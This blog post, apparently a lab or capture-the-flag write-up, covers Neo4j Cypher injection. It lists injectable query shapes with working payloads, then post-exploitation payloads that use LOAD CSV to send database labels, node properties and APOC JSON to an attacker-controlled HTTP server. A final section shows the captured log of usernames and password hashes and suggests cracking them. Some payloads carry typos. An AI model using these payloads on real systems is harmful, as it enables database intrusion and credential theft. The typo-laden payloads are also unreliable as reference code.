Neo4j Exfiltrate data ,Injection
Injections
How to inject
Injectable query Injection Macth (o) where o.Id='{input}' 'OR 1=1 with 0 as _l00 {...} RETURN 1 // MATCH (o) wehre '{input}' = o.Id '=' {...} with 0 as _l00 return 1 // MATCH (o) where {input} in [different,values] MATCH (o) where o:{input} a {...} with 0 as _l00 return 1 // MATCH (o) where o:`{input}` a` {...} with 0 as _l00 return 1 // MATCH (o {id:'{input}'}) '}) return 1 union match (n) {...} return 1 // MATCH (o:{input}) a) return 1 union match (n) {...} return 1 // MATCH (o:`{input}`) a`) return 1 union match (n) {...} return 1 // MATCH (o)-[r {id:'{input}'}]-(o2) '}]-() return 1 union match (n) {...} return 1 // MATCH (o)-[r:{input}]-(o2) a]-() return 1 union match (n) {...} return 1 // MATCH (o)-[r:`{input}`]-(o2) a`]-() return 1 union match (n) {...} return 1 //
Note the UNION statement:
1.The reason UNION is required is that if the MATCH statement doesn't return anything,the rest of the query won't run.So all the nefarious things we might do there will simply not execute.
2. We add "RETURN 1" before the UNION so both parts return the same columns,which is required for the query to execute.
Note the WITH statement:
1.Using WITH ,we can drop all existing variables.This is important when we don't know what the query is (more on that later).If our payload accidentally tries to set a variables that already exists,the query will fail to run.
2.If we know the query and the database,none of these techiniques are required.We can even manipulate the returned data to in turn manipulate the process instead of just abusing the server.
Post exploitation
HTTP LOAD CSV
LOAD CSV is a built-in statement that can be used to exfiltrate data.
Load CSV tries to load a csv either from the filesystem or from the web.
Usually,an attacker can use the web functionality to exfiltrate data,If the vulnerable query is :
1 | MATCH (o) where o.Id='{input}' return o |
then the attacker can inject the following strings:
1 | ' or 1=1 With 1 as _l00 CALL dbms.procedures() yield name LOAD CSV FROM 'https://attacker's ip/' <br> name as _l return 1 // |
This will send all the installed procedures in the database to the attacker's server.
Extracting data from neo4j
There are many built-in and APOC funcions that can help us get information about the database.
Get labels
Using the built-in method db.labels,it is possible to list all existing labels.
Arguments:None
Injection example:
1 | '}) return 0 as _0 union call db.labels() yield label laod csv from 'http://attacker'sip/?l=' <br>+ label as 1 return 0 as _0 |
Get the properties of a node and their values
The built-in function keys can be used to list the keys of the properties.
Arguments:
A node or a map
Its possible to retrieve the value of a propety from the node if you treat it as a map:n[key],
so we can use load csv to exfiltrate the data.Be sure to use toString.
Injection example
' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.2.4:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 // ' or 1=1 with 1 as a match (f:Flag) unwind keys(f) as p load csv from 'http://ip/?'+p+'='+toString(f[p]) as l return 0 as _0 //
Tips:This won't work if one of the fields is a list or a map.
If APOC is avaiable,there's better way to do it using apoc.convert.toJson.
' or 1=1 with 0 as _0 match (n) load csv from 'http://ip/?' + apoc.convert.toJson(n) as l return 0 as _0 //
return value:
String--the JSON representation of the input
'}) return 0 as _0 union match (f:Flag) load csv from 'http://ip:port/?json='+apoc.convert.toJson(f) as 1 return 0 as _0 //
Actual attack
' or 1=1 with 1 as a call db.labels() yield label load csv from 'http://10.10.14.16/?label='+label as l return 0 as _0 //
It will return the following information to our python server:
$sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:20] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:20] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:26:20] "GET /?label=employee HTTP/1.1" 200
Retrieve the values of the keys for 'users'.Here is our payload:
' or 1=1 with 1 as a match (f:user) unwind keys(f) as p load csv from 'http://10.10.14.16/?'+p+'='+toString(f[p]) as l return 0 as _0 //
This returns the following:
0.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:10] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Aug/2023 13:33:10] "GET /?username=john HTTP/1.1" 200 -
Using john or hashcat to crack these two password.
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列1:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现
· 【杂谈】分布式事务——高大上的无用知识?